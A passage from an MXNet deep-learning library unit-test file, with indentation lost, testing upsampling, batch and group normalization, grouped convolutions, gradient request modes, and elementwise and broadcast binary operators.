for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out.reshape(dshape), mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
